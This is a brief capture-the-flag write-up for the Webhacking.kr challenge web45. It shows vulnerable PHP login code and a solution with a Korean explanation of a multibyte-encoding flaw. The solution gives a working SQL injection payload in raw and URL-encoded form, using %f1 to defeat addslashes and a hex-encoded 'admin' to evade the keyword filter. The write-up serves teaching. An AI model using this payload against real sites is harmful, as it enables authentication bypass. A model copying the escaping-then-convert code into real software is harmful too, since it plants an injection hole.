Webhacking.kr - web45
web45
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
if($_GET['id'] && $_GET['pw']){
$db = dbconnect();
$_GET['id'] = addslashes($_GET['id']);
$_GET['pw'] = addslashes($_GET['pw']);
$_GET['id'] = mb_convert_encoding($_GET['id'],'utf-8','euc-kr');
if(preg_match("/admin|select|limit|pw|=|<|>/i",$_GET['id'])) exit();
if(preg_match("/admin|select|limit|pw|=|<|>/i",$_GET['pw'])) exit();
$result = mysqli_fetch_array(mysqli_query($db,"select id from chall45 where id='{$_GET['id']}' and pw=md5('{$_GET['pw']}')"));
if($result){
echo "hi {$result['id']}";
if($result['id'] == "admin") solve(45);
}
else echo("Wrong");
}
?>
Solution
1
2
3
4
멀티바이트에서 유니코드 변환 시 %a1~%fe 사이 값이 백슬래쉬 앞에 있으면 발생하는 취약점
id=%f1' or id like (0x61646D696E) #
id=%f1%27%20or%20id%20like%20(0x61646D696E)%20%23
This post is licensed under CC BY 4.0 by the author.